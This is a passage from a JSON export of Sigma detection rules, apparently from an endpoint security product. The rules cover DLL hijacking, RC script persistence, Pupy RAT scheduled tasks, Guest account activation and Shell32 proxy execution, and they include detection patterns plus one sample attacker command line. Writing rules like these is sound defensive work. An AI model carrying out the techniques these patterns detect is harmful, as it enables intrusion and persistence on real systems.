"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_easinvoker.yml",
"content": "title: DLL Hijacking via easinvoker.exe\nid: 0baf276d-d629-4eb2-948c-1b0f87b13160\ndescription: |\n Detects potential Windows DLL Hijacking via easinvoker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'easinvoker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AUTHZ.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\SAMLIB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0baf276d-d629-4eb2-948c-1b0f87b13160",
"rule_name": "DLL Hijacking via easinvoker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via easinvoker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0bc4d271-7029-4c83-bad4-a9ea34b7213b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612097Z",
"creation_date": "2026-03-23T11:45:34.612101Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612108Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon",
"https://attack.mitre.org/techniques/T1037/004/"
],
"name": "t1037_004_rc_common_modified_linux.yml",
"content": "title: RC Script /etc/rc.common Modified\nid: 0bc4d271-7029-4c83-bad4-a9ea34b7213b\ndescription: |\n Detects an attempt to modify the RC script /etc/rc.common.\n The /etc/rc.common file is a script that is used to perform system-level tasks during the boot process on Unix-like systems.\n Adversaries can establish persistence by adding a malicious binary path or shell commands to this file.\n It is recommended to investigate the process that read the `rc.common` file for suspicious activities.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon\n - https://attack.mitre.org/techniques/T1037/004/\ndate: 2022/12/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1037.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/rc.common'\n - TargetPath: '/etc/rc.common'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_docker:\n ProcessImage: '/usr/bin/dockerd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0bc4d271-7029-4c83-bad4-a9ea34b7213b",
"rule_name": "RC Script /etc/rc.common Modified",
"rule_description": "Detects an attempt to modify the RC script /etc/rc.common.\nThe /etc/rc.common file is a script that is used to perform system-level tasks during the boot process on Unix-like systems.\nAdversaries can establish persistence by adding a malicious binary path or shell commands to this file.\nIt is recommended to investigate the process that read the `rc.common` file for suspicious activities.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1037.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0c371a93-177d-4ced-82ad-dc148a365686",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083926Z",
"creation_date": "2026-03-23T11:45:34.083928Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083932Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/n1nj4sec/pupy",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_pupy_scheduled_task.yml",
"content": "title: Pupy Scheduled Task Persistence Added\nid: 0c371a93-177d-4ced-82ad-dc148a365686\ndescription: |\n Detects a suspicious scheduled task creation that is related to Pupy Attack Framework.\n Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in Python.\n It is recommended to download and investigate the 'elevator.xml' file.\n It is also recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://github.com/n1nj4sec/pupy\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2021/02/08\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Pupy\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\schtasks.exe'\n # \"C:\\Windows\\System32\\schtasks.exe\" /create /xml c:\\users\\user\\appdata\\local\\temp\\elevator.xml /tn elevator\n CommandLine|contains|all:\n - '/create '\n - '/xml '\n - '/tn elevator'\n - '\\AppData\\Local\\Temp\\elevator.xml'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0c371a93-177d-4ced-82ad-dc148a365686",
"rule_name": "Pupy Scheduled Task Persistence Added",
"rule_description": "Detects a suspicious scheduled task creation that is related to Pupy Attack Framework.\nPupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in Python.\nIt is recommended to download and investigate the 'elevator.xml' file.\nIt is also recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2021-02-08",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0c391c25-0ca4-4a33-a98e-d0de4cc1eee6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084746Z",
"creation_date": "2026-03-23T11:45:34.084748Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084752Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/RedDrip7/status/1545245625662418945",
"https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_version.yml",
"content": "title: DLL Hijacking of VERSION.DLL\nid: 0c391c25-0ca4-4a33-a98e-d0de4cc1eee6\ndescription: |\n Detects a potential Windows DLL search order hijacking of VERSION.DLL.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n By putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/RedDrip7/status/1545245625662418945\n - https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/15\nmodified: 2025/10/21\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\version.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ImageLoaded|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_windows_sandbox:\n ImageLoaded|startswith: '\\Device\\vmsmb\\VSMB-'\n Imphash: '00000000000000000000000000000000' # mean we didn't get any info about the DLL\n\n exclusion_legitimate_dll:\n # old pascal/delphi \"version.dll\", not the MS ones (and upx packed..)\n sha256:\n - '31144e8b156fe87317073c48a09abcb033fda8dbdd96986c4abea8c00c00355f'\n - '3eba921ef649b71f98d9378dee8105b38d2464c9ccde37a694e4a0cd77d22a75'\n - '645ca9e88da21c63710a04a0f54421018df415a3d612112c71a255c49325c082'\n - 'd7ce1a67db5dee613760775ad4639ddb9ed2dd07f169996c78133820337d1aa3' # C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\VERSION.dll\n - 'a9a39c8c61d5cdcb9ea67e7ee5916d7f60dfe40b31474381cbdf0102f698fbb4' # Balatro\\version.dll\n\n exclusion_veeam:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\rundll32.exe aepdu.dll,AePduRunUpdate'\n - '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\\\*\\Bin\\ccSvcHst.exe'\n # SHA-256: 3d520df7824e332886a1307d3153e0fb5c2b85ac67a1e194ee3adb1bfbaecf8a\n # SHA-256: ccd18aa682718cd765840c249c10c9be4d41affd8fc7a590d5f25619a22814f5\n ImageLoaded: '?:\\Program Files (x86)\\Veeam\\Backup Transport\\GuestInteraction\\VSS\\VeeamGuestHelpers\\WinCoreCompatLayer\\version.dll'\n\n exclusion_signed:\n Signature:\n # ImageLoaded: 'C:\\Program Files\\QlikView\\Server\\QlikViewClients\\QlikViewAjax\\bin\\Version.dll'\n - 'QlikTech International AB'\n - 'ASUSTeK Computer Inc.'\n - 'IObit CO., LTD'\n - 'Veeam Software Group GmbH'\n\n exclusion_imageloaded:\n ImageLoaded:\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\System32\\version.dll'\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\amd64_microsoft-windows-version_*\\version.dll'\n - '?:\\ProgramData\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\forwarders\\version.dll'\n\n exclusion_app:\n ProcessImage|contains:\n - '\\App\\GlaryUtilities\\'\n - '\\App\\SketchUp 20??\\'\n - '\\App\\TreeSize\\TreeSize.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Glarysoft Ltd'\n - 'Trimble Inc.'\n - 'JAM Software GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0c391c25-0ca4-4a33-a98e-d0de4cc1eee6",
"rule_name": "DLL Hijacking of VERSION.DLL",
"rule_description": "Detects a potential Windows DLL search order hijacking of VERSION.DLL.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nBy putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-15",
"rule_modified_date": "2025-10-21",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0c620fa1-5877-425b-b91e-920d723b4eab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591725Z",
"creation_date": "2026-03-23T11:45:34.591728Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591736Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dxcap.yml",
"content": "title: DLL Hijacking via dxcap.exe\nid: 0c620fa1-5877-425b-b91e-920d723b4eab\ndescription: |\n Detects potential Windows DLL Hijacking via dxcap.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dxcap.exe'\n ImageLoaded|endswith:\n - '\\d3d11.dll'\n - '\\dbghelp.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0c620fa1-5877-425b-b91e-920d723b4eab",
"rule_name": "DLL Hijacking via dxcap.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dxcap.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0c76fbf6-2adc-4728-bf4c-92b0f9d5c847",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088943Z",
"creation_date": "2026-03-23T11:45:34.088945Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088949Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest",
"https://attack.mitre.org/techniques/T1078/001/"
],
"name": "t1078_001_guest_account_enabled.yml",
"content": "title: Guest Account Enabled\nid: 0c76fbf6-2adc-4728-bf4c-92b0f9d5c847\ndescription: |\n Detects the activation of the Guest account.\n This account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\n It is recommended to investigate this action to determine its legitimacy and investigate any suspicious authentications using the guest account.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2024/01/04\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4722\n TargetSid|endswith: '-501'\n\n condition: selection\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0c76fbf6-2adc-4728-bf4c-92b0f9d5c847",
"rule_name": "Guest Account Enabled",
"rule_description": "Detects the activation of the Guest account.\nThis account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\nIt is recommended to investigate this action to determine its legitimacy and investigate any suspicious authentications using the guest account.\n",
"rule_creation_date": "2024-01-04",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0cd0225c-b3cf-4b13-b578-75c10f83bbb5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086416Z",
"creation_date": "2026-03-23T11:45:34.086418Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086422Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Shell32/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_suspicious_shell32.yml",
"content": "title: Suspicious Proxy Execution via Shell32\nid: 0cd0225c-b3cf-4b13-b578-75c10f83bbb5\ndescription: |\n Detects the suspicious execution of the legitimate Windows DLL Shell32.dll using parameters allowing for proxy execution.\n This binary can be used as a LOLBin in order to execute binaries or load DLLs.\n It is recommended to investigate the process responsible for the execution of Shell32 as well as the executed payload to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Shell32/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/15\nmodified: 2025/10/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Shell32\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_exec_rundll:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'rundll32.exe'\n\n selection_exec_shell32:\n CommandLine|contains|all:\n - 'shell32'\n - ','\n\n selection_exec_args:\n CommandLine|contains:\n - 'Control_RunDLL'\n - '#274' # Control_RunDLL\n - '#275' # Control_RunDLLA\n - '#276' # Control_RunDLLAsUserW\n - '#277' # Control_RunDLLW\n - 'ShellExec_RunDLL'\n - '#569' # ShellExec_RunDLL\n - '#570' # ShellExec_RunDLLA\n - '#571' # ShellExec_RunDLLW\n\n selection_suspicious_ordinal:\n CommandLine|contains:\n - '#274' # Control_RunDLL\n - '#275' # Control_RunDLLA\n - '#276' # Control_RunDLLAsUserW\n - '#277' # Control_RunDLLW\n - '#569' # ShellExec_RunDLL\n - '#570' # ShellExec_RunDLLA\n - '#571' # ShellExec_RunDLLW\n\n selection_suspicious_folder:\n CommandLine|contains:\n - '\\AppData\\'\n - '\\Temp\\'\n - '%AppData%'\n - '%LocalAppData%'\n - '%Temp%'\n - '?:\\Users\\Public'\n - '?:\\PerfLogs\\'\n\n exclusion_share:\n ParentImage|startswith: '\\\\\\\\'\n\n exclusion_legitimate:\n CommandLine|contains:\n - '@screensaver'\n - 'mmsys.cpl,,playback'\n - 'mmsys.cpl,,sounds'\n - 'mmsys.cpl,,recording'\n - 'mmsys.cpl,,{0.0.0.00000000}'\n - '?:\\Windows\\system32\\\\*.cpl'\n - '?:\\windows\\CCM\\\\*.cpl'\n - '\\Office??\\MLCFG32.CPL'\n - 'PowerCfg.cpl @0,/editplan:'\n - 'input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2}'\n - 'inetcpl.cpl,,0'\n - 'Control_RunDLL desk.cpl,'\n - 'sysdm.cpl,,1'\n - 'Control_RunDLL timedate.cpl'\n - 'Control_RunDLL nusrmgr.cpl'\n - 'Control_RunDLL srchadmin.dll'\n - 'Control_RunDLL ?:\\WINDOWS\\System32\\srchadmin.dll'\n - 'Control_RunDLL appwiz.cpl,'\n - 'Control_RunDLL bthprops.cpl,'\n\n exclusion_jp2launcher:\n ParentImage:\n - '?:\\Program Files\\Java\\\\*\\bin\\jp2launcher.exe'\n - '?:\\Program Files (x86)\\\\*\\bin\\jp2launcher.exe'\n\n # https://www.berger-levrault.com/fr/\n exclusion_berger-levrault:\n ParentImage: '?:\\Program Files (x86)\\BL\\BL\\bin\\e.magnus.exe'\n\n exclusion_healthcare:\n ParentImage: '?:\\Program Files\\GE Healthcare\\Centricity\\\\*.exe'\n\n exclusion_xilinx:\n ParentImage: '?:\\Xilinx\\xic\\tps\\win64\\\\*\\bin\\java.exe'\n\n condition: all of selection_exec_* and 1 of selection_suspicious_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0cd0225c-b3cf-4b13-b578-75c10f83bbb5",
"rule_name": "Suspicious Proxy Execution via Shell32",
"rule_description": "Detects the suspicious execution of the legitimate Windows DLL Shell32.dll using parameters allowing for proxy execution.\nThis binary can be used as a LOLBin in order to execute binaries or load DLLs.\nIt is recommended to investigate the process responsible for the execution of Shell32 as well as the executed payload to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-10-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0cde446e-6eec-4d9c-a4df-ad0b836c3406",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080575Z",
"creation_date": "2026-03-23T11:45:34.080577Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080581Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdservicehost.yml",
